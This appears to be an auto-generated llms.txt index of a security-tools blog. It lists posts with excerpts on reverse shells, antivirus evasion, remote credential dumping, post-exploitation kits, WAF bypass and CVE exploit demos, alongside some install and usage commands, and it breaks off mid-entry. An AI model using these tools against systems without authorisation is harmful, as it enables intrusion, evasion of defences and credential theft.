Generated by Rank Math SEO, this is an llms.txt file designed to help LLMs better understand and index this website. # Security Tools - CyTools ## Sitemaps [XML Sitemap](https://tools.cyberkendra.com/sitemap_index.xml): Includes all crawlable and indexable pages. ## Posts - [WP2Shell Vulnerability Checker – Test Your WordPress in Seconds](https://tools.cyberkendra.com/2026/07/wp2shell-checker-tool.html): Check your WordPress site vulnerable to WP2Shell. Instant version checker, patch steps, WAF rules, detection scripts and IOCs for CVE-2026-63030 / CVE-2026-60137. - [T3MP3ST — Autonomous Red Teaming Platform](https://tools.cyberkendra.com/2026/07/t3mp3st-autonomous-red-teaming-platform.html): A multi-agent offensive-security framework, built to turn the AI coding agent you already run into a zero-day hunter. - [SightHouse: Automated Function Identification for Reverse Engineering](https://tools.cyberkendra.com/2026/04/sighthouse-automated-function-identification-for-reverse-engineering.html): SightHouse is an open-source tool developed by Quarkslab that helps reverse engineers automatically identify known functions inside binaries by matching them with previously analyzed code. - [CISO Assistant — One-stop GRC Platform for Risk Management, AppSec](https://tools.cyberkendra.com/2026/03/ciso-assistant-one-stop-grc-platform-for-risk-management-appsec.html): CISO Assistant offers a fresh perspective on Cybersecurity Management and GRC (Governance, Risk, and Compliance) practices: - [AndroHunter – Android Security Research Toolkit](https://tools.cyberkendra.com/2026/03/androhunter-android-security-research-toolkit.html): AndroHunter is a native Android application that provides a full suite of mobile security testing tools — all running directly on the device without requiring a rooted phone for most features. It is designed for security researchers participating in bug bounty programs (HackerOne, Yes We Hack, Intigriti, etc.) who need to analyze Android applications quickly and efficiently. - [WhatsApp Activity Tracker – Track WhatsApp by Phone Number](https://tools.cyberkendra.com/2025/12/whatsapp-tracking-by-phone-number.html): This project implements the research from the paper "Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers" by Gabriel K. Gegenhuber, Maximilian Günther, Markus Maier, Aljosha Judmayer, Florian Holzbauer, Philipp É. Frenzel, and Johanna Ullrich (University of Vienna & SBA Research). - [Username Finder](https://tools.cyberkendra.com/2025/07/username-finder.html): Advanced OSINT Tool - Search Usernames Across 400+ Social Media Platforms - [PyXL – Python Directly in Hardware](https://tools.cyberkendra.com/2025/04/pyxl-python-directly-in-hardware.html): PyXL is a custom hardware processor that executes Python directly — no interpreter, no JIT, and no tricks. It takes regular Python code and runs it in silicon. - [CF-Hero : Find Real IP Behind Cloudflare](https://tools.cyberkendra.com/2025/03/cf-hero-find-real-ip-behind-cloudflare.html): CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It gathers multi-source intelligence through various methods. - [HExHTTP – HTTP Header Exploitation Tool](https://tools.cyberkendra.com/2025/01/hexhttp-http-header-exploitation-tool.html): HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors. Features Server Error response checking Localhost header response analysis Vhosts checking Methods response analysis HTTP Version analysis Cache Poisoning DoS (CPDoS) techniques Web cache poisoning Range poisoning/error (416 response error) Cookie Reflection CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) Installation Python pip install -r requirements.txt ./hexhttp.py -u 'https://target.tld/' # OR python3 hexhttp.py -u 'https://target.tld/'' Docker docker build -t hexhttp:latest . docker run --rm -it --net=host -v "$PWD:/hexhttp/" hexhttp:latest -u 'https://target.tld/' Usage Usage: hexhttp.py HExHTTP is a tool designed to perform tests on HTTP headers. options: -h, --help show this help message and exit -u URL, --url URL URL to test -f URL_FILE, --file URL_FILE File of URLs -H CUSTOM_HEADER, --header CUSTOM_HEADER Add a custom HTTP Header -A USER_AGENT, --user-agent USER_AGENT Add a custom User Agent -F, --full Display the full HTTP Header -a AUTH, --auth AUTH Add an HTTP authentication. Ex: --auth admin:admin -b, --behavior Activates a simplified version of verbose, highlighting interesting cache behaviors -hu HUMANS, --humans HUMANS Performs a timesleep to reproduce human behavior (Default: 0s) value: "r" or "random" -t THREADS, --threads THREADS Threads numbers for multiple URLs. Default: 10 -l LOG, --log LOG Set the logging level (DEBUG, INFO, WARNING, ERROR, CRITICAL) -L LOG_FILE, --log-file LOG_FILE The file path pattern for the log file. Default: logs/ -v, --verbose Increase verbosity (can be used multiple times) Check HExHTTP - [Hanko – An Authentication and User Management Solution for the Passkey](https://tools.cyberkendra.com/2025/01/hanko-an-authentication-and-user-management-solution-for-the-passkey.html): Hanko is an open-source authentication and user management solution with a focus on moving the login beyond passwords while being 100% deployable today. - [Postiz – Free AI Social Media Scheduling Tool](https://tools.cyberkendra.com/2025/01/postiz-free-ai-social-media-scheduling-tool.html): Postiz: An alternative to: Buffer.com, Hypefury, Twitter Hunter, Etc... - [Maigret – Search Person by Username from Thousands of Sites](https://tools.cyberkendra.com/2025/01/maigret-search-person-by-username-from-thousands-of-sites.html): Maigret collects a dossier on a person by username only, checks for accounts on many sites, and gathers all the available information from web pages. No API keys are required. Maigret is an easy-to-use and powerful fork of Sherlock. - [Logicytics: System Data Harvester](https://tools.cyberkendra.com/2024/09/logicytics-system-data-harvester.html): Info alert! Run the script with the admin privileges. - [Dubbie – Open-source AI video dubbing studio](https://tools.cyberkendra.com/2024/08/dubbie-open-source-ai-video-dubbing-studio.html): Dubbie is an open-source AI dubbing studio that costs $0.1/min, which is about ~20x less than alternatives like ElevenLabs, RaskAI, or Speechify. While still in early development and not at feature parity with these alternatives, Dubbie offers enough features to create dubs for basic videos. - [Hamster Kombat: Auto Clicker and Desktop Version](https://tools.cyberkendra.com/2024/07/hamster-kombat-auto-clicker-and-desktop-version.html): Everyone is now familiar with the trending telegram-based crypto game name Hamster Kombat, a game that blends adorable critters with the world of cryptocurrency, which is taking the internet by storm. - [GWPSan: Sampling-Based Sanitizer Framework](https://tools.cyberkendra.com/2024/06/gwpsan-sampling-based-sanitizer-framework.html): To build GWPSan static and dynamic runtime libraries: - [Agentic Security – LLM Security Scanner](https://tools.cyberkendra.com/2024/05/agentic-security-llm-security-scanner.html): Agentic Security uses plain text HTTP specs like: - [How to Make an Ultraviolet Proxy](https://tools.cyberkendra.com/2024/04/how-to-make-an-ultraviolet-proxy.html): Some of the popular websites that Ultraviolet supports include: - [Indetectables Toolkit – A Toolkit for Reversing, Malware Analysis, and Cracking](https://tools.cyberkendra.com/2024/04/indetectables-toolkit-a-toolkit-for-reversing-malware-analysis-and-cracking.html): This tool compilation is carefully crafted to be useful both for beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld. - [Morphic – An AI-powered answer engine with a generative UI.](https://tools.cyberkendra.com/2024/04/morphic-an-ai-powered-answer-engine-with-a-generative-ui.html): It is an AI-powered answer engine with a generative UI. - [Xzbot: Exploit Demo for the xz backdoor (CVE-2024-3094)](https://tools.cyberkendra.com/2024/04/xzbot-exploit-demo-for-the-xz-backdoor-cve-2024-3094.html): Exploration of the xz backdoor (CVE-2024-3094). Includes the following: - [OpenUI – Next-Gen Tool for Building Powerful Applications](https://tools.cyberkendra.com/2024/03/openui-next-gen-tool-for-building-powerful-applications.html): OpenUI aims to make the process fun, fast, and flexible. It lets users describe UI using their imagination, and then see it rendered live. You can ask for changes and convert HTML to React, Svelte, Web Components, etc. It's like v0 but open source and not as polished 😝. - [BlueSpy – Tool to Record Audio from a Bluetooth Device](https://tools.cyberkendra.com/2024/03/bluespy-tool-to-record-audio-from-a-bluetooth-device.html): The PoC uses the following tools: - [Web-Check – Comprehensive, on-demand open source intelligence for any website](https://tools.cyberkendra.com/2024/01/web-check-comprehensive-on-demand-open-source-intelligence-for-any-website.html): Web-Check is a powerful all-in-one tool for discovering information about a website/host. The core philosophy is simple: feed Web-Check a URL and let it gather, collate, and present a broad array of open data for you to delve into. - [SSH-Snake: Automated SSH-Based Network Traversal](https://tools.cyberkendra.com/2024/01/ssh-snake-automated-ssh-based-network-traversal.html): 🐍 SSH-Snake is a powerful tool designed to perform automatic network traversal using SSH private keys discovered on systems, to create a comprehensive map of a network and its dependencies, identifying to what extent a network can be compromised using SSH and SSH private keys starting from a particular system. - [WebCopilot – An automation tool for XSS, SQLi, LFI, SSRF and RCE](https://tools.cyberkendra.com/2024/01/webcopilot-an-automation-tool-for-xss-sqli-lfi-ssrf-and-rce.html): WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools. - [Exploit Released for VMware Aria Operations for Networks RCE (CVE-2023-20887) Bug](https://tools.cyberkendra.com/2023/06/exploit-released-for-vmware-aria-operations-for-networks-rce-cve-2023-20887-bug.html): A group of researchers has unveiled a proof-of-concept (PoC) demonstration for a serious Remote Code Execution (RCE) vulnerability present in VMware's Aria Operations for Networks. This software suite is commonly utilized by large-scale networks, making the potential impact of this vulnerability quite substantial. - [Windows DHCP Remote Code Execution Vulnerability (CVE-2023-28231)](https://tools.cyberkendra.com/2023/04/windows-dhcp-remote-code-execution-vulnerability-cve-2023-28231.html): Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information, such as subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on the Bootstrap Protocol (BOOTP), which shares many implementation details with DHCP. DHCP allows a host to obtain required TCP/IP configuration information from a DHCP server. - [teler : Real-time HTTP Intrusion Detection](https://tools.cyberkendra.com/2022/12/teler-real-time-http-intrusion-detection.html): Teler is a real-time intrusion detection and threat alert based on a weblog that runs in a terminal with resources that we collect and provide by the community. ❤️ - [OpenAI Chat GPT Google Chrome Extension](https://tools.cyberkendra.com/2022/12/openai-chat-gpt-google-chrome-extension.html): Chrome Extension that Integrates ChatGPT (Unofficial) into Google Search. - [APTRS – An Automated Penetration Testing Reporting System](https://tools.cyberkendra.com/2022/11/aptrs-an-automated-penetration-testing-reporting-system.html): APTRS (Automated Penetration Testing Reporting System) is an automated reporting tool in Python and Django. The tool allows Penetration testers to create a report directly without using the Traditional Docx file. It also provides an approach to keeping track of the projects and vulnerabilities. - [INTLog – A Flask app to Track Interesting Artifacts during an Investigation](https://tools.cyberkendra.com/2022/11/intlog-a-flask-app-to-track-interesting-artifacts-during-an-investigation.html): INTLog is a simple Flask app designed to keep track of potentially interesting artifacts during an investigation. - [EmailAll – A powerful Email Collect tool](https://tools.cyberkendra.com/2022/11/emailall-a-powerful-email-collect-tool.html):  EmailAllis a powerful Email Collect tool —— a powerful email collection tool. - [DonPAPI : Dumping DPAPI Credential Remotely](https://tools.cyberkendra.com/2022/11/donpapi-dumping-dpapi-credential-remotely.html): Dumping relevant information on compromised targets without AV detection. - [AWSGoat : A Damn Vulnerable AWS Infrastructure](https://tools.cyberkendra.com/2022/11/awsgoat-a-damn-vulnerable-aws-infrastructure.html): Compromising an organization's cloud infrastructure is like sitting on a gold mine for attackers. And sometimes, a simple misconfiguration or a vulnerability in web applications, is all an attacker needs to compromise the entire infrastructure. Since the cloud is relatively new, many developers are not fully aware of the threatscape and they end up deploying a vulnerable cloud infrastructure. - [Custom Processing Unit – Framework to Hook, Patch and Trace CPU Microcode](https://tools.cyberkendra.com/2022/08/custom-processing-unit-framework-to-hook-patch-and-trace-cpu-microcode.html): Custom Processing Unit is the first dynamic analysis framework able to hook, patch, and trace CPU microcode at the software level. - [Vulnerable Spring Framework Application for Testing Spring4Shell](https://tools.cyberkendra.com/2022/03/vulnerable-spring-framework-application-for-testing-spring4shell.html): This application is intentionally built for testing  Remote Code Execution on Spring Core aka Spring4Shell.  - [DirtyPipe for Android – Root Exploit for Pixel 6](https://tools.cyberkendra.com/2022/03/dirtypipe-for-android-root-exploit-for-pixel-6.html): Dirty Pipe (CVE-2022-0847) temporary root PoC for Android. Currently, this exploit run on Pixel 6 only with security patch level 2022-02-05. - [httpx – multi-purpose HTTP toolkit](https://tools.cyberkendra.com/2021/12/httpx-multi-purpose-http-toolkit.html): httpx is a fast and multi-purpose HTTP toolkit allows to run of multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads. - [XORpass – An encoder to bypass WAF](https://tools.cyberkendra.com/2021/11/xorpass-an-encoder-to-bypass-waf.html): XORpass is an encoder to bypass WAF filters using XOR operations. - [Commix – Automatic Command Injection Exploiter Tool](https://tools.cyberkendra.com/2021/10/commix-automatic-command-injection-exploiter-tool.html): Commix (short for and njection eploiter) is an open-source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities. - [Mariana Trench: Tool to test Android App](https://tools.cyberkendra.com/2021/09/mariana-trench-tool-to-test-android-app.html): Mariana Trench is a security-focused static analysis platform targeting Android. - [PwnLnX – Advanced Python Reverse Shell for Hacking](https://tools.cyberkendra.com/2021/09/pwnlnx-advanced-python-reverse-shell-for-hacking.html): An advanced multi-threaded, multi-client python reverse shell for hacking Linux systems. There's still more work to do so feel free to help out with the development.  - [Kubescape – Manage Kubernetes Security](https://tools.cyberkendra.com/2021/09/kubescape-manage-kubernetes-security.html): Kubescape is the first tool for testing if Kubernetes is deployed securely as defined in Kubernetes Hardening Guidance by NSA and CISA - [LibAFL, the fuzzer library](https://tools.cyberkendra.com/2021/07/libafl-the-fuzzer-library.html): Advanced Fuzzing Library - Slot your own fuzzers together and extend their features using Rust. - [Mobile Verification Toolkit For Pegasus Infection](https://tools.cyberkendra.com/2021/07/mobile-verification-toolkit-for-pegasus-infection.html): Mobile Verification Toolkit (MVT) is a collection of utilities to simplify and automate the process of gathering forensic traces helpful to identify a potential compromise of Android and iOS devices. - [HiveNightmare aka CVE-2021–36934](https://tools.cyberkendra.com/2021/07/hivenightmare-aka-cve-2021-36934.html): A zero-day exploit for HiveNightmare, which allows you to retrieve all registry hives in Windows 10 as a non-administrator user. For example, this includes hashes in SAM, which can be used to execute code as SYSTEM. - [Download Burp Suite 2021.6](https://tools.cyberkendra.com/2021/05/download-burp-suite-2021-6.html): This release includes the following bug fixes. - [Profil3r – Profiles of a Person on Social Networks](https://tools.cyberkendra.com/2021/05/profil3r-profiles-of-a-person-on-social-networks.html): Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses. This program also alerts you to the presence of a data leak for the found emails. - [Winbindex – The Windows Binaries Index](https://tools.cyberkendra.com/2021/05/winbindex-the-windows-binaries-index.html): An index of Windows binaries, including download links for executables such as exe, dll and sys files. - [Download Burp Suite 2021.5.1](https://tools.cyberkendra.com/2021/05/download-burp-suite-2021-5-1.html): What's new in Burp Suite 2021.5.1  - [Routopsy – Tool to Hijack Network Routes](https://tools.cyberkendra.com/2020/08/routopsy-tool-to-hijack-network-routes.html): Routopsy is a toolkit built to attack often overlooked networking protocols. Routopsy currently supports attacks against Dynamic Routing Protocols (DRP) and First-Hop Redundancy Protocols (FHRP). Most of the attacks currently implemented make use of a weaponised 'virtual router' as opposed to implementing protocols from scratch. The tooling is not limited to the virtual routers, and allows for further attacks to be implemented in python3 or by adding additional containers. - [OWASP Mobile Security Testing Guide (MSTG).](https://tools.cyberkendra.com/2020/04/owasp-mobile-security-testing-guide-mstg.html): The OWASP Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing - [Nexus Repository Manager CVE-2020-10199/10204](https://tools.cyberkendra.com/2020/04/nexus-repository-manager-cve-2020-10199-10204.html): Nexus Repository Manager OSS/Pro: <=3.21.1 - [pspy tool – Monitor linux processes without root permissions](https://tools.cyberkendra.com/2020/04/pspy-tool-monitor-linux-processes-without-root-permissions.html): pspy - unprivileged Linux process snooping pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes. Download Get the tool onto the Linux machine you want to inspect. First get the binaries. Download the released binaries here: 32 bit big, static version: pspy32 download 64 bit big, static version: pspy64 download 32 bit small version: pspy32s download 64 bit small version: pspy64s download Some complex examples: # print both commands and file system events and scan procfs every 1000 ms (=1sec) ./pspy64 -pf -i 1000 # place watchers recursively in two directories and non-recursively into a third ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir # disable printing discovered commands but enable file system events ./pspy64 -p=false -f Download pspy Tool - [Programming Linux Anti-Reversing Techniques](https://tools.cyberkendra.com/2020/04/programming-linux-anti-reversing-techniques.html): Programming Linux Anti-Reversing Techniques teaches the reader how to code and analyze well known anti-reversing techniques for Linux. The book shows how a reverse engineer analyzes a binary using tools like IDA, Radare2, GDB, readelf, and more. The code is presented to the reader ready to compile and analyze on their own. DOWNLOAD - [Scanners Box : A Powerful Hackers Tool](https://tools.cyberkendra.com/2019/06/scanners-box-a-powerful-hackers-tool.html): Scanners Box also known as scanbox, is a powerful hacker toolkit, which collects more than 10 categories of open source scanners from Github, including subdomain, database, middleware and other modular design scanner etc. But for other Well-known scanning tools, such as nmap, w3af, brakeman, arachni, nikto, metasploit, aircrack-ng will not be included in the scope of collection. - [Server-side Request Forgery Detector](https://tools.cyberkendra.com/2019/06/server-side-request-forgery-detector.html): This is the application source code for the SSRF Detector website. The website has been EOL as of April 7th 2017, but the code has been updated to be run on a local machine. This documentation is a little touch-and-go as there is a lot of configuration for Nginx, SSL, etc... but for a local instance it can be run as-is. - [Gorsair – Penetration Testing tool for Docker](https://tools.cyberkendra.com/2019/02/gorsair-penetration-testing-tool-for-docker.html): Gorsair is a penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. Once it has access to the docker daemon, you can use Gorsair to directly execute commands on remote containers. Exposing the docker API on the internet is a tremendous risk, as it can let malicious agents get information on all of the other containers, images and system, as well as potentially getting privileged access to the whole system if the image uses the rootuser. Install   Run the following command to install gorsair. curl https://github.com/Ullaakut/Gorsair/releases/download/$GORSAIR_VERSION/gorsair_$OS_$ARCH --output /usr/local/bin/gorsair DOWNLOAD - [Hash Generator & Cracker Online Offline](https://tools.cyberkendra.com/2019/01/hash-generator-cracker-online-offline.html): #Install Note Clone the repository: git clone https://github.com/0xR0/hediye.git #Then go inside: cd hediye/ #use examples: python3 hediye.py -k Key / For --> Generate Hash (md5, sha1, sha224, sha256, sha384, sha512) python3 hediye.py -v HASH -f Wordlist / For --> Brute Force Attack (md5, sha1, sha224, sha256, sha384, sha512)) python3 hediye.py -n HASH / For --> Online Search (md5, sha1, sha224, sha256, sha384, sha512)) GET IT - [PHANTOM EVASION 2.0.1- An Antivirus Evasion Tool](https://tools.cyberkendra.com/2019/01/phantom-evasion-2-0-1-an-antivirus-evasion-tool.html): Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules. - [XSShell – A XSS Reverse Shell Framework](https://tools.cyberkendra.com/2018/11/xsshell-a-xss-reverse-shell-framework.html): XSShell also comes with a number of premade XSS payloads to use: - [Zstandard – Fast real-time compression algorithm](https://tools.cyberkendra.com/2018/11/zstandard-fast-real-time-compression-algorithm.html): Zstandard, or zstd as short version, is a fast lossless compression algorithm, targeting real-time compression scenarios at zlib-level and better compression ratios. It's backed by a very fast entropy stage, provided by Huff0 and FSE library. - [CloudBunny : Capture Real IP of Server behind WAF](https://tools.cyberkendra.com/2018/11/cloudbunny-capture-real-ip-of-server-behind-waf.html): CloudBunny is a tool to capture the origin server that uses a WAF as a proxy or protection. - [FakeImageExploiter – Use a Fake Image to Exploit Target](https://tools.cyberkendra.com/2018/11/fakeimageexploiter-use-a-fake-image-to-exploit-target.html): This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them. - [DFIRTrack: (Digital Forensics and Incident Response Tracking application](https://tools.cyberkendra.com/2018/11/dfirtrack-digital-forensics-and-incident-response-tracking-application.html): DFIRTrack (Digital Forensics and Incident Response Tracking application) is an open source web application mainly based on Djangousing a PostgreSQL database backend. - [DROID-HUNTER – Android Pentesting Tool](https://tools.cyberkendra.com/2018/09/droid-hunter-android-pentesting-tool.html): Android application vulnerability analysis and Android pentest tool - [HackBar (Burpsuite Plugin)](https://tools.cyberkendra.com/2018/09/hackbar-burpsuite-plugin.html): Tested on - [Step: A tool to Make Work easier for zero trust technologies](https://tools.cyberkendra.com/2018/08/step-a-tool-to-make-work-easier-for-zero-trust-technologies.html): Step is a zero trust swiss army knife. It’s an easy-to-use and hard-to-misuse utility for building, operating, and automating systems that use zero trust technologies like authenticated encryption (X.509, TLS), single sign-on (OAuth OIDC, SAML), multi-factor authentication (OATH OTP, FIDO U2F), encryption mechanisms (JSON Web Encryption, NaCl), and verifiable claims (JWT, SAML assertions). - [p0wnedShell : Post Exploitation Toolkit](https://tools.cyberkendra.com/2018/08/p0wnedshell-post-exploitation-toolkit.html): p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.   How to Compile it:To compile p0wnedShell you need to open this project within Microsoft Visual Studio and build it for the x64/x86 platform. You can change the following AutoMasq options before compiling: public static bool AutoMasq = true;public static string masqBinary = @"C:WindowsNotepad.exe"; How to use it: With AutoMasq set to false, you just run the executable so it runs normally. With AutoMasq enabled, you could rename the p0wnedShell executable as the process you're going to masquerade (masqBinary), so it has the appearance of that process (for example notepad.exe). Using the optional "-parent" commandline argument, you can start p0wnedShell using another Parent Process ID. When combining the PEB Masq option and different parent process ID (for example svchost), you can give p0wnedShell the appearance of a legitimate service ;) DOWNLOAD - [Bashark – Post exploitation toolkit](https://tools.cyberkendra.com/2018/08/bashark-post-exploitation-toolkit.html): Introduction Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. Usage To launch Bashark on compromised host, simply source the bashark.sh script from terminal: $ source bashark.sh Then type help to see Bashark's help menu Features Single Bash script Lightweight and fast Multi-platform: Unix, OSX, Solaris etc. No external dependencies Immune to heuristic and behavioural analysis Built-in aliases of often used shell commands Extends system shell with post-exploitation oriented functionalities Stealthy, with custom cleanup routine activated on exit Easily extensible (add new commands by creating Bash functions) Full tab completion DOWNLOAD  - [Repo Security Scanner – Search secrets from GitHub](https://tools.cyberkendra.com/2018/08/repo-security-scanner-search-secrets-from-github.html): repo-security-scanner CLI tool that finds secrets accidentally committed to a git repo, eg passwords, private keys Run it against your entire repo's history by piping the output from git log -p Installation Download the latest stable release of the CLI tool for your architecture Extract the tar and move the scanrepobinary to somewhere in your $PATH, eg /usr/bin Usage Check the entire history of the current branch for secrets. $ git log -p | scanrepo DOWNLOAD - [Stegextract: Extract Hidden files and strings from Images.](https://tools.cyberkendra.com/2018/07/stegextract-extract-hidden-files-and-strings-from-images.html): Description Stegextract extracts any trailing data after the image's closing bytes, and any hidden files (or other images) embedded within the image. Short byte combinations such as JPEG's FFD8 FFE0 might sometimes create false positives. Manually reviewing the hexdump is sometimes inevitable in cases of highly complex embedded files. Stegextract is not the solution for any color/pixel/filter/LSB related Steganography, nor does it try to be. It relies on magic numbers, hexdumps and binary data alone. Currently supports PNG, JPG, and GIF. Update: --analyze flag was deprecated and is now being performed automatically with every scan. Installation sudo curl https://raw.githubusercontent.com/evyatarmeged/stegextract/master/stegextract > /usr/local/bin/stegextract sudo chmod +x /usr/local/bin/stegextract Usage Usage: stegextract <file> -h, --help Print this and exit -o, --outfile Specify an outfile -s, --strings Extract strings from file -q, --quiet Do not output to stdout --force-format Force this image format instead of detecting   DOWNLOAD - [Raccoon: Tool for Reconnaissance and Information Gathering](https://tools.cyberkendra.com/2018/07/raccoon-tool-for-reconnaissance-and-information-gathering.html): For the latest stable version: - [Photon: Fast web crawler for Recon](https://tools.cyberkendra.com/2018/07/photon-fast-web-crawler-for-recon.html): Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target. - [WAScan – Web Application Scanner](https://tools.cyberkendra.com/2018/06/wascan-web-application-scanner.html): WAScan ((W)eb (A)pplication (Scan)ner) is a Open Source web application security scanner. It is designed to find various vulnerabilities using "black-box" method, that means it won't study the source code of web applications but will work like a fuzzer, scanning the pages of the deployed web application, extracting links and forms and attacking the scripts, sending payloads and looking for error messages,..etc. WAScan is built on python2.7 and can run on any platform which has a Python environment.Features - [Takeover – SubDomain TakeOver Vulnerability Scanner](https://tools.cyberkendra.com/2018/06/takeover-subdomain-takeover-vulnerability-scanner.html): Sub-domain takeover vulnerability occur when a sub-domain (subdomain.example.com) is pointing to a service (e.g: GitHub, AWS/S3,..) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that sub-domain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com. For more information: here Installation: # git clone https://github.com/m4ll0k/takeover.git  # cd takeover  # python takeover.py Download TakeOver - [SubFinder – Powerfull Sub-domain Enumeration Tool](https://tools.cyberkendra.com/2018/06/subfinder-powerfull-sub-domain-enumeration-tool.html): Features - [SubOver – Subdomain Takeover Tool](https://tools.cyberkendra.com/2018/06/subover-subdomain-takeover-tool.html): Subover is a Hostile Subdomain Takeover tool originally written in python but rewritten from scratch in Golang. Since it's redesign, it has been aimed with speed and efficiency in mind. Till date, SubOver detects 30+ services which is much more than any other tool out there. The tool uses Golang concurrency and hence is very fast. It can easily detect and report potential subdomain takeovers that exist. The list of potentially hijackable services is very comprehensive and it is what makes this tool so powerful. - [SandMap: Network and System Reconnaissance using Nmap engine.](https://tools.cyberkendra.com/2018/06/sandmap-network-and-system-reconnaissance-using-nmap-engine.html): Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. - [Droid Application Fuzz Framework](https://tools.cyberkendra.com/2018/03/droid-application-fuzz-framework.html): PDF Viewers/Readers - [KRACK Detector: Know KRACK Attack on Your Network](https://tools.cyberkendra.com/2017/10/krack-detector-know-krack-attack-on-your-network.html): KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then disconnects the suspected device, preventing it from sending any further sensitive data to the Access Point. - [Official Black Hat Arsenal Tools Github Repository](https://tools.cyberkendra.com/2017/10/official-black-hat-arsenal-tools-github-repository.html): This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility, the tools are classified by category and not by session. - [Steel.Password- Easily get Apple users ID’s](https://tools.cyberkendra.com/2017/10/steel-password-easily-get-apple-users-ids.html): Do you want the user's Apple ID password, to get access to their Apple account, or to try the same email/password combination on different web services? Just ask your users politely, they'll probably just hand over their credentials, as they're trained to do so 👌 iOS asks the user for their iTunes password for many reasons, the most common ones are recently installed iOS operating system updates, or iOS apps that are stuck during installation. As a result, users are trained to just enter their Apple ID password whenever iOS prompts you to do so. However, those popups are not only shown on the lock screen, and the home screen, but also inside random apps, e.g. when they want to access iCloud, GameCenter or In-App-Purchases. This could easily be abused by any app, just by showing an UIAlertController, that looks exactly like the system dialog. Even users who know a lot about technology have a hard time detecting that those alerts are phishing attacks. Disclaimer This is just a proof of concept, phishing attacks are illegal! Don't use this in any of your apps. The goal of this blog post is to close the loophole that has been there for many years, and hasn't been addressed yet. For moral reasons, I decided not to include the actual source code of the popup, however it was shockingly easy to replicate the system dialog. Screenshot Download - [Hijacker v1.3- WiFi Hacking Tool for Android](https://tools.cyberkendra.com/2017/09/hijacker-v1-3-wifi-hacking-tool-for-android.html): Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon(it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work. Features Information Gathering View a list of access points and stations (clients) around you (even hidden ones) View the activity of a specific network (by measuring beacons and data packets) and its clients Statistics about access points and stations See the manufacturer of a device (AP or station) from the OUI database See the signal power of devices and filter the ones that are closer to you Save captured packets in .cap file Attacks Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target) Deauthenticate a specific client from the network it's connected MDK3 Beacon Flooding with custom options and SSID list MDK3 Authentication DoS for a specific network or to everyone Capture a WPA handshake or gather IVs to crack a WEP network Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter). Installation Make sure: you are on Android 5+ you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU) have a firmware to support Monitor Mode on your wireless interface Download the latest version here. - [Radare2- Debug Windows apps in Linux and Mac](https://tools.cyberkendra.com/2017/09/radare2-debug-windows-apps-in-linux-and-mac.html): r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. - [XSStrike: Fuzz, Crawl and Bruteforce Parameters for XSS](https://tools.cyberkendra.com/2017/08/xsstrike-fuzz-crawl-and-bruteforce-parameters-for-xss.html): XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Visit XSStrike's project site for more info. - [Hash Buster – scraps online hash crackers to find cleartext of a 